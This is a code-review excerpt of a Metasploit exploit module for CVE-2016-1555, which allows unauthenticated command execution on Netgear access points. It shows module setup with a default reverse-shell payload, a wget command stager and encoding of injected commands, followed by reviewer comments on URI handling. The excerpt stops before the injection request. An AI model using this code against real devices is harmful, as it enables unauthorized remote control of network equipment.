modules/exploits/linux/http/netgear_unauth_exec.rb

```diff
@@ -0,0 +1,109 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'Netgear Devices Unauthenticated Remote Command Execution',
+      'Description' => %q{
+        From the CVE-2016-1555 page: (1) boardData102.php, (2) boardData103.php,
+        (3) boardDataJP.php, (4) boardDataNA.php, and (5) boardDataWW.php in
+        Netgear WN604 before 3.3.3 and WN802Tv2, WNAP210v2, WNAP320, WNDAP350,
+        WNDAP360, and WNDAP660 before 3.5.5.0 allow remote attackers to execute
+        arbitrary commands.
+      },
+      'Author'      =>
+        [
+          'Daming Dominic Chen <ddchen[at]cs.cmu.edu>', # Vuln discovery
+          'Imran Dawoodjee <imrandawoodjee.infosec[at]gmail.com>' # MSF module
+        ],
+      'License'     => MSF_LICENSE,
+      'References'  =>
+        [
+          ['CVE', '2016-1555'],
+          ['URL', 'https://kb.netgear.com/30480/CVE-2016-1555-Notification?cid=wmt_netgear_organic'],
+          ['PACKETSTORM', '135956'],
+          ['URL', 'http://seclists.org/fulldisclosure/2016/Feb/112']
+        ],
+      'DisclosureDate' => 'Feb 25 2016', # According to http://seclists.org/fulldisclosure/2016/Feb/112
+      'Privileged'     => true,
+      'Platform'       => 'linux',
+      'Arch'           => ARCH_MIPSBE,
+      'Payload'        => {},
+      'DefaultOptions' => {
+        'CMDSTAGER::FLAVOR' => 'wget',
+        'PAYLOAD'           => 'linux/mipsbe/shell_reverse_tcp',
+        'WfsDelay'          => 10 },
+      'Targets'        => [['Automatic', { }]],
+      'CmdStagerFlavor'=> %w{ echo printf wget },
+      'DefaultTarget'  => 0
+      ))
+      register_options(
+      [
+        OptString.new('TARGETURI', [true, 'Path of the vulnerable URI.', 'boardDataWW.php']),
+        OptString.new('MAC_ADDRESS', [true, 'MAC address to use (default: random)', rand_text_numeric(12)])
+      ])
+  end
+
+  def filter_bad_chars(cmd)
+    cmd.gsub!(/chmod \+x/, 'chmod 777')
+    cmd.gsub!(/;/, ' %26%26 ')
+    cmd.gsub!(/ /, '+')
+  end
+
+  # post request
+  def request_post(command, targeturi, mac_addr)
+    send_request_cgi({
+    'method'  => 'POST',
+    'headers' => { 'Connection' => 'Keep-Alive' },
+    'uri'     => normalize_uri('/', "#{targeturi}"),
```

Comment:
```suggestion
    'uri'     => normalize_uri(target_uri.path),
```

Reply:
I don't really see a need to normalize it. The target URI is literally just that: `http://[ip_address]/boardDataWW.php`. If the datastore is modified to `/boardDataWW.php`, then we should already be set.

Reply:
True, normalization shouldn't be required. The `targeturi` should be updated to `/boardDataWW.php` with the leading `/`.

Reply:
Fixed in commit 818cb37aca24573587ec39e6424f076e3c86e17a.